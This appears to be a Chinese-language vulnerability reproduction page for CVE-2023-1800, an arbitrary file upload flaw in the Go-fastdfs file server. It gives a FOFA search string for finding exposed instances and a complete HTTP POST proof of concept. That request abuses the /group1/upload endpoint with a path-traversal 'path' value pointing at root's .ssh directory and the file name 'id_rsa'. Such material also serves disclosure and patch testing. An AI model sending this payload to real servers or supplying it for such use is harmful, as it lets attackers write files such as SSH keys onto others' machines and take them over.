# Go-fastdfs upload 任意文件上传漏洞 CVE-2023-1800 ## 漏洞描述 Go-fastdfs upload 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件到服务器中,攻击服务器 ## 漏洞影响 ``` Go-fastdfs ``` ## FOFA ``` "go-fastdfs" ``` ## 漏洞复现 主页面 ![image-20230417094508409](images/image-20230417094508409.png) 验证POC ``` POST /group1/upload HTTP/1.1 Host: Content-Length: 951 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryigj9M9EJykZc9u53 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close ------WebKitFormBoundaryigj9M9EJykZc9u53 Content-Disposition: form-data; name="file"; filename="id" Content-Type: application/octet-stream test ------WebKitFormBoundaryigj9M9EJykZc9u53 Content-Disposition: form-data; name="scene" default ------WebKitFormBoundaryigj9M9EJykZc9u53 Content-Disposition: form-data; name="filename" id_rsa ------WebKitFormBoundaryigj9M9EJykZc9u53 Content-Disposition: form-data; name="output" json2 ------WebKitFormBoundaryigj9M9EJykZc9u53 Content-Disposition: form-data; name="path" ../../../../../root/.ssh ------WebKitFormBoundaryigj9M9EJykZc9u53 Content-Disposition: form-data; name="code" ------WebKitFormBoundaryigj9M9EJykZc9u53 Content-Disposition: form-data; name="auth_token" ------WebKitFormBoundaryigj9M9EJykZc9u53 Content-Disposition: form-data; name="submit" upload ------WebKitFormBoundaryigj9M9EJykZc9u53-- ``` ![image-20230417100221820](images/image-20230417100221820.png) ![image-20230417100230696](images/image-20230417100230696.png)